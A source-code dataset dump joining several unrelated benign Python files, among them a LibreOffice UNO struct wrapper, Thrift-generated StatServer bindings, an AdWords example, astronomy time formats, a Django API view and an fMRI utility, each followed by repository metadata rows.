# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Struct Class
# this is a auto generated file generated by Cheetah
# Namespace: com.sun.star.ucb
# Libre Office Version: 7.3
from ooo.oenv.env_const import UNO_NONE
import typing
class FetchResult(object):
"""
Struct Class
contains data of several rows of a ContentResultSet.
This struct is returned from XFetchProvider.fetch(), for example.
See Also:
`API FetchResult <https://api.libreoffice.org/docs/idl/ref/structcom_1_1sun_1_1star_1_1ucb_1_1FetchResult.html>`_
"""
__ooo_ns__: str = 'com.sun.star.ucb'
__ooo_full_ns__: str = 'com.sun.star.ucb.FetchResult'
__ooo_type_name__: str = 'struct'
typeName: str = 'com.sun.star.ucb.FetchResult'
"""Literal Constant ``com.sun.star.ucb.FetchResult``"""
def __init__(self, Rows: typing.Optional[typing.Tuple[object, ...]] = UNO_NONE, StartIndex: typing.Optional[int] = 0, Orientation: typing.Optional[bool] = False, FetchError: typing.Optional[int] = 0) -> None:
"""
Constructor
Arguments:
Rows (typing.Tuple[object, ...], optional): Rows value.
StartIndex (int, optional): StartIndex value.
Orientation (bool, optional): Orientation value.
FetchError (int, optional): FetchError value.
"""
super().__init__()
if isinstance(Rows, FetchResult):
oth: FetchResult = Rows
self.Rows = oth.Rows
self.StartIndex = oth.StartIndex
self.Orientation = oth.Orientation
self.FetchError = oth.FetchError
return
kargs = {
"Rows": Rows,
"StartIndex": StartIndex,
"Orientation": Orientation,
"FetchError": FetchError,
}
if kargs["Rows"] is UNO_NONE:
kargs["Rows"] = None
self._init(**kargs)
def _init(self, **kwargs) -> None:
self._rows = kwargs["Rows"]
self._start_index = kwargs["StartIndex"]
self._orientation = kwargs["Orientation"]
self._fetch_error = kwargs["FetchError"]
@property
def Rows(self) -> typing.Tuple[object, ...]:
"""
contains the demanded data.
One any contains the data of one whole row. Those methods which use this struct have to specify, what the any has to contain.
"""
return self._rows
@Rows.setter
def Rows(self, value: typing.Tuple[object, ...]) -> None:
self._rows = value
@property
def StartIndex(self) -> int:
"""
indicates the index of the first row contained in FetchResult.Rows in the original result set.
So if FetchResult.StartIndex equals 3, the first element in the sequence FetchResult.Rows contains the data of the index 3 in the original result set.
The following rows are one after the other, but the direction depends on the value of FetchResult.Direction
"""
return self._start_index
@StartIndex.setter
def StartIndex(self, value: int) -> None:
self._start_index = value
@property
def Orientation(self) -> bool:
"""
indicates the orientation in which the rows are fetched and set into the sequence FetchResult.Rows.
When FetchResult.Orientation equals TRUE, the rows in FetchResult.Rows are ordered in the same way as in the original result set.
"""
return self._orientation
@Orientation.setter
def Orientation(self, value: bool) -> None:
self._orientation = value
@property
def FetchError(self) -> int:
"""
indicates whether and which error has occurred, while fetching.
The value may contain zero or more constants of the FetchError constants group.
"""
return self._fetch_error
@FetchError.setter
def FetchError(self, value: int) -> None:
self._fetch_error = value
__all__ = ['FetchResult']
| 33.911111
| 212
| 0.643949
|
0f1bf4db8dc7bd6741b979c2d345c13f44c5825d
| 94
|
py
|
Python
|
road/road.py
|
jadnohra/daisy
|
105c0f37c6adbe85ce830375c5e2fc89cbcc6cc9
|
[
"MIT"
] | 3
|
2021-09-26T10:50:35.000Z
|
2022-01-25T02:44:37.000Z
|
road/road.py
|
jadnohra/daisy
|
105c0f37c6adbe85ce830375c5e2fc89cbcc6cc9
|
[
"MIT"
] | 1
|
2021-09-09T14:19:31.000Z
|
2021-09-09T14:19:31.000Z
|
road/road.py
|
jadnohra/daisy
|
105c0f37c6adbe85ce830375c5e2fc89cbcc6cc9
|
[
"MIT"
] | null | null | null |
class Road():
def __init__(self):
self.curves = []
self.curve_table = {}
| 15.666667
| 29
| 0.521277
|
2f95d7f49f4077545aa98069a4fa5f0216750104
| 462
|
py
|
Python
|
plotly/validators/streamtube/colorbar/_tickprefix.py
|
omridanan/plotly.py
|
a8d26670cba49ce15ce9b7639ae0f55a6088a825
|
[
"MIT"
] | 2
|
2020-03-24T11:41:14.000Z
|
2021-01-14T07:59:43.000Z
|
plotly/validators/streamtube/colorbar/_tickprefix.py
|
omridanan/plotly.py
|
a8d26670cba49ce15ce9b7639ae0f55a6088a825
|
[
"MIT"
] | null | null | null |
plotly/validators/streamtube/colorbar/_tickprefix.py
|
omridanan/plotly.py
|
a8d26670cba49ce15ce9b7639ae0f55a6088a825
|
[
"MIT"
] | 4
|
2019-06-03T14:49:12.000Z
|
2022-01-06T01:05:12.000Z
|
import _plotly_utils.basevalidators
class TickprefixValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name='tickprefix',
parent_name='streamtube.colorbar',
**kwargs
):
super(TickprefixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='colorbars',
role='style',
**kwargs
)
| 24.315789
| 72
| 0.612554
|
7b06afc32f991d7af528fc9179e7ef21a5fe8cb7
| 15,778
|
py
|
Python
|
systemb/gen-py/StatServer/StatServer.py
|
Arnawk/statserver
|
2c7182870859b013f1f2b556a62667fc877ab428
|
[
"MIT"
] | null | null | null |
systemb/gen-py/StatServer/StatServer.py
|
Arnawk/statserver
|
2c7182870859b013f1f2b556a62667fc877ab428
|
[
"MIT"
] | 3
|
2020-07-17T13:08:35.000Z
|
2021-05-09T19:38:44.000Z
|
systemb/gen-py/StatServer/StatServer.py
|
Arnawk/statserver
|
2c7182870859b013f1f2b556a62667fc877ab428
|
[
"MIT"
] | null | null | null |
#
# Autogenerated by Thrift Compiler (0.9.1)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
def ping(self):
pass
def calculateStat(self, allNumbers):
"""
Parameters:
- allNumbers
"""
pass
def generateNums(self):
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def ping(self):
self.send_ping()
return self.recv_ping()
def send_ping(self):
self._oprot.writeMessageBegin('ping', TMessageType.CALL, self._seqid)
args = ping_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_ping(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = ping_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "ping failed: unknown result");
def calculateStat(self, allNumbers):
"""
Parameters:
- allNumbers
"""
self.send_calculateStat(allNumbers)
return self.recv_calculateStat()
def send_calculateStat(self, allNumbers):
self._oprot.writeMessageBegin('calculateStat', TMessageType.CALL, self._seqid)
args = calculateStat_args()
args.allNumbers = allNumbers
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_calculateStat(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = calculateStat_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "calculateStat failed: unknown result");
def generateNums(self):
self.send_generateNums()
return self.recv_generateNums()
def send_generateNums(self):
self._oprot.writeMessageBegin('generateNums', TMessageType.CALL, self._seqid)
args = generateNums_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_generateNums(self):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = generateNums_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "generateNums failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["ping"] = Processor.process_ping
self._processMap["calculateStat"] = Processor.process_calculateStat
self._processMap["generateNums"] = Processor.process_generateNums
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_ping(self, seqid, iprot, oprot):
args = ping_args()
args.read(iprot)
iprot.readMessageEnd()
result = ping_result()
result.success = self._handler.ping()
oprot.writeMessageBegin("ping", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_calculateStat(self, seqid, iprot, oprot):
args = calculateStat_args()
args.read(iprot)
iprot.readMessageEnd()
result = calculateStat_result()
result.success = self._handler.calculateStat(args.allNumbers)
oprot.writeMessageBegin("calculateStat", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_generateNums(self, seqid, iprot, oprot):
args = generateNums_args()
args.read(iprot)
iprot.readMessageEnd()
result = generateNums_result()
result.success = self._handler.generateNums()
oprot.writeMessageBegin("generateNums", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class ping_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ping_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ping_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class calculateStat_args:
"""
Attributes:
- allNumbers
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'allNumbers', (TType.I32,None), None, ), # 1
)
def __init__(self, allNumbers=None,):
self.allNumbers = allNumbers
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.allNumbers = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in xrange(_size0):
_elem5 = iprot.readI32();
self.allNumbers.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('calculateStat_args')
if self.allNumbers is not None:
oprot.writeFieldBegin('allNumbers', TType.LIST, 1)
oprot.writeListBegin(TType.I32, len(self.allNumbers))
for iter6 in self.allNumbers:
oprot.writeI32(iter6)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class calculateStat_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (StatStruct, StatStruct.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = StatStruct()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('calculateStat_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class generateNums_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('generateNums_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class generateNums_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.I32,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype10, _size7) = iprot.readListBegin()
for _i11 in xrange(_size7):
_elem12 = iprot.readI32();
self.success.append(_elem12)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('generateNums_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.I32, len(self.success))
for iter13 in self.success:
oprot.writeI32(iter13)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 30.400771
| 188
| 0.680504
|
6129d236a97b8cfe5c00e78aa8feb6d900ec6278
| 3,978
|
py
|
Python
|
adwords_python3_examples_10.1.0/v201710/remarketing/add_conversion_trackers.py
|
xyla-io/hazel
|
260ce906761d8b808c21ca61b44cc71ca3329e8c
|
[
"MIT"
] | null | null | null |
adwords_python3_examples_10.1.0/v201710/remarketing/add_conversion_trackers.py
|
xyla-io/hazel
|
260ce906761d8b808c21ca61b44cc71ca3329e8c
|
[
"MIT"
] | null | null | null |
adwords_python3_examples_10.1.0/v201710/remarketing/add_conversion_trackers.py
|
xyla-io/hazel
|
260ce906761d8b808c21ca61b44cc71ca3329e8c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example adds AdWords conversion trackers.
Adds an AdWords conversion tracker and an upload conversion tracker.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import uuid
from googleads import adwords
def main(client):
# Initialize appropriate service.
conversion_tracker_service = client.GetService(
'ConversionTrackerService', version='v201710')
# Create an AdWords conversion tracker.
adwords_conversion_tracker = {
'xsi_type': 'AdWordsConversionTracker',
'name': 'Earth to Mars Cruises Conversion #%s' % uuid.uuid4(),
'category': 'DEFAULT',
# Optional fields.
'status': 'ENABLED',
'viewthroughLookbackWindow': '15',
'defaultRevenueValue': '23.41',
'alwaysUseDefaultRevenueValue': 'true'
}
upload_conversion = {
'xsi_type': 'UploadConversion',
'name': 'Upload Conversion #%s' % uuid.uuid4(),
# Optional fields.
# Set an appropriate category. This will be set to DEFAULT if not
# specified.
'category': 'LEAD',
'viewthroughLookbackWindow': '30',
'ctcLookbackWindow': '90',
# Set the default currency code to use for conversions that do
# not specify a conversion currency. This must be an ISO 4217 3-character
# code such as "EUR" or "USD".
# If this field is not set, AdWords will use the account's currency.
'defaultRevenueCurrencyCode': 'EUR',
# Set the default revenue value to use for conversions that do not specify
# a converison value. Note that this value should NOT be in micros.
'defaultRevenueValue': '2.50',
# To upload fractional conversion credits, mark the upload conversion as
# externally attributed. To learn more about importing externally
# attributed conversions, see:
# https://developers.google.com/adwords/api/docs/guides/conversion-tracking#importing_externally_attributed_conversions
# 'isExternallyAttributed': 'true'
}
# Construct operations.
operations = [{
'operator': 'ADD',
'operand': conversion_tracker
} for conversion_tracker in [adwords_conversion_tracker, upload_conversion]]
# Add the conversions.
conversion_trackers = conversion_tracker_service.mutate(operations)
# Display results.
for conversion_tracker in conversion_trackers['value']:
if (conversion_tracker['ConversionTracker.Type']
is 'AdWordsConversionTracker'):
print(('Conversion tracker with ID "%d", name "%s", status "%s" '
'and category "%s" and snippet \n"%s"\n was added.' %
(conversion_tracker['id'], conversion_tracker['name'],
conversion_tracker['status'], conversion_tracker['category'],
conversion_tracker['snippet'])))
else:
print(('Conversion with ID "%d", name "%s", status "%s", and category '
'"%s" was added.'
% (conversion_tracker['id'], conversion_tracker['name'],
conversion_tracker['status'], conversion_tracker['category'])))
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client)
| 38.25
| 125
| 0.698592
|
7711f21861b0dedaf44da997db3f6d28b89038ea
| 857
|
py
|
Python
|
setup.py
|
potatolondon/django-hashbrown
|
bb78243b649ddc7a8acb66bbbd5c2643ba7bfca0
|
[
"BSD-2-Clause"
] | 13
|
2015-02-06T12:07:23.000Z
|
2022-03-18T23:20:22.000Z
|
setup.py
|
potatolondon/django-hashbrown
|
bb78243b649ddc7a8acb66bbbd5c2643ba7bfca0
|
[
"BSD-2-Clause"
] | 3
|
2015-03-09T10:23:55.000Z
|
2018-08-29T09:42:32.000Z
|
setup.py
|
potatolondon/django-hashbrown
|
bb78243b649ddc7a8acb66bbbd5c2643ba7bfca0
|
[
"BSD-2-Clause"
] | 4
|
2016-07-20T14:08:06.000Z
|
2019-07-18T09:30:07.000Z
|
import os
from setuptools import setup, find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
setup(
name="django-hashbrown",
version="0.7.0",
author="Pablo Recio",
author_email="pablo@potatolondon.com",
description="Yet another dead simple feature switching library for Django.",
long_description=(read('README.md')),
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
],
license="BSD",
keywords="django feature switching potato",
url='https://github.com/potatolondon/django-hashbrown',
packages=find_packages(),
zip_safe=False,
)
| 28.566667
| 80
| 0.655776
|
23939bac8e429b28aff1a06e4660864b270551bd
| 164
|
py
|
Python
|
bin/iamonds/one-sided-hexiamonds-trefoil-1.py
|
tiwo/puzzler
|
7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e
|
[
"Intel"
] | null | null | null |
bin/iamonds/one-sided-hexiamonds-trefoil-1.py
|
tiwo/puzzler
|
7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e
|
[
"Intel"
] | null | null | null |
bin/iamonds/one-sided-hexiamonds-trefoil-1.py
|
tiwo/puzzler
|
7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e
|
[
"Intel"
] | 1
|
2022-01-02T16:54:14.000Z
|
2022-01-02T16:54:14.000Z
|
#!/usr/bin/env python
# $Id$
"""many solutions"""
import puzzler
from puzzler.puzzles.hexiamonds import OneSidedHexiamondsTrefoil1 as puzzle
puzzler.run(puzzle)
| 16.4
| 75
| 0.77439
|
38fff84b4c52b40c0ff62e54125f0dddad1080ce
| 1,625
|
py
|
Python
|
lightkurve/time.py
|
burke86/lightkurve
|
fda3e92544ccc3c6b38d003b2980a232fbcbbd0b
|
[
"MIT"
] | 1
|
2021-05-07T10:42:01.000Z
|
2021-05-07T10:42:01.000Z
|
lightkurve/time.py
|
burke86/lightkurve
|
fda3e92544ccc3c6b38d003b2980a232fbcbbd0b
|
[
"MIT"
] | 7
|
2018-07-14T17:49:36.000Z
|
2020-09-24T19:58:13.000Z
|
lightkurve/time.py
|
barentsen/lightkurve
|
5b1693832bc509e42742d1b6f20224d131e62d8c
|
[
"MIT"
] | null | null | null |
"""Adds the BKJD and BTJD time format for use by Astropy's `Time` object."""
from astropy.time.formats import TimeNumeric, day_frac
class TimeBKJD(TimeNumeric):
"""
Barycentric Kepler Julian Date time format.
This represents the number of days since January 1, 2009 12:00:00 UTC.
BKJD is the format in which times are recorded in Kepler data products.
See Section 2.3.2 in the Kepler Archive Manual for details.
"""
name = 'bkjd'
BKJDREF = 2454833 # Barycentric Kepler Julian Date offset
def set_jds(self, val1, val2):
self._check_scale(self._scale) # Validate scale.
jd1, jd2 = day_frac(val1, val2)
jd1 += self.BKJDREF
self.jd1, self.jd2 = day_frac(jd1, jd2)
def to_value(self, **kwargs):
jd1 = self.jd1 - self.BKJDREF
jd2 = self.jd2
return super().to_value(jd1=jd1, jd2=jd2, **kwargs)
value = property(to_value)
class TimeBTJD(TimeNumeric):
"""
Barycentric TESS Julian Date time format.
This represents the number of days since JD 2457000.0.
BTJD is the format in which times are recorded in TESS data products.
"""
name = 'btjd'
BTJDREF = 2457000 # Barycentric TESS Julian Date offset
def set_jds(self, val1, val2):
self._check_scale(self._scale) # Validate scale.
jd1, jd2 = day_frac(val1, val2)
jd1 += self.BTJDREF
self.jd1, self.jd2 = day_frac(jd1, jd2)
def to_value(self, **kwargs):
jd1 = self.jd1 - self.BTJDREF
jd2 = self.jd2
return super().to_value(jd1=jd1, jd2=jd2, **kwargs)
value = property(to_value)
| 32.5
| 76
| 0.651692
|
0ed31141ab23336ce9ccc2e9894808f8c6023279
| 1,503
|
py
|
Python
|
profiles_api/views.py
|
bertcanoiii/Django_RestAPI_Course
|
4bac42aee77187240c0628360ce43af62c8f4839
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
bertcanoiii/Django_RestAPI_Course
|
4bac42aee77187240c0628360ce43af62c8f4839
|
[
"MIT"
] | null | null | null |
profiles_api/views.py
|
bertcanoiii/Django_RestAPI_Course
|
4bac42aee77187240c0628360ce43af62c8f4839
|
[
"MIT"
] | null | null | null |
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from profiles_api import serializers
class HelloApiView(APIView):
"""Test API view!"""
serializer_class = serializers.HelloSerializer
def get(self, response, format=None):
"""Returns list of API features"""
an_apiview = [
"Uses HTTP Methods as functions",
"Similar to traditional Django views",
"Give the most control over your application logic",
"Is mapped manually to urls"
]
return Response({"message": "Hello!", "an_apiview": an_apiview})
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get("name")
message = f"Hello {name}!"
return Response({"message": message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None):
"""Handle updating an object"""
return Response({"method": "PUT"})
def patch(self, request, pk=None):
"""Handle a partial update of an object"""
return Response({"method": "PATCH"})
def delete(self, request, pk=None):
"""Delete and object"""
return Response({"method": "DELETE"})
| 31.978723
| 72
| 0.611444
|
a0a62eebf1c173551ea4b944d6ecad5d17c0a636
| 2,765
|
py
|
Python
|
fmridenoise/utils/entities.py
|
brain-net-cog/fMRIDenoise
|
22de3251573bd87ffb4cf5097bd5a8bfefb6f47f
|
[
"Apache-2.0"
] | 22
|
2019-06-23T14:40:02.000Z
|
2020-01-10T15:05:13.000Z
|
fmridenoise/utils/entities.py
|
brain-net-cog/fMRIDenoise
|
22de3251573bd87ffb4cf5097bd5a8bfefb6f47f
|
[
"Apache-2.0"
] | 35
|
2020-01-22T16:15:16.000Z
|
2022-01-24T17:40:29.000Z
|
fmridenoise/utils/entities.py
|
brain-net-cog/fMRIDenoise
|
22de3251573bd87ffb4cf5097bd5a8bfefb6f47f
|
[
"Apache-2.0"
] | 11
|
2020-04-01T21:18:41.000Z
|
2021-12-14T10:55:09.000Z
|
import typing as t
from bids.layout import parse_file_entities, writing
from fmridenoise.pipelines import extract_pipeline_from_path
def parse_file_entities_with_pipelines(filename, entities=None, config=None,
include_unmatched=False) -> t.Dict[str, str]:
"""
bids.extract_pipelines_from_path extended with ability to
"""
et_dict = parse_file_entities(filename, entities, config, include_unmatched)
pipeline = extract_pipeline_from_path(filename)
if pipeline:
et_dict['pipeline'] = pipeline
return et_dict
def is_entity_subset(entity_superset: t.Dict[str, str], entity_subset: t.Dict[str, str]) -> bool:
"""
Checks if all key values in subset are in superset
Args:
entity_superset: bigger dict
entity_subset: smaller dict
Returns: true if all key-values pairs from entity_subset are in entity_superset
"""
return all(entity_superset.get(entity_key) == entity_value for entity_key, entity_value in entity_subset.items())
def build_path(entities, path_patterns, strict=False):
"""
Extension of bids.build_path that throws exception instead of returning None
Args:
entities:
A dictionary mapping entity names to entity values.
Entities with ``None`` or empty-string value will be removed.
Otherwise, entities will be cast to string values, therefore
if any format is expected (e.g., zero-padded integers), the
value should be formatted.
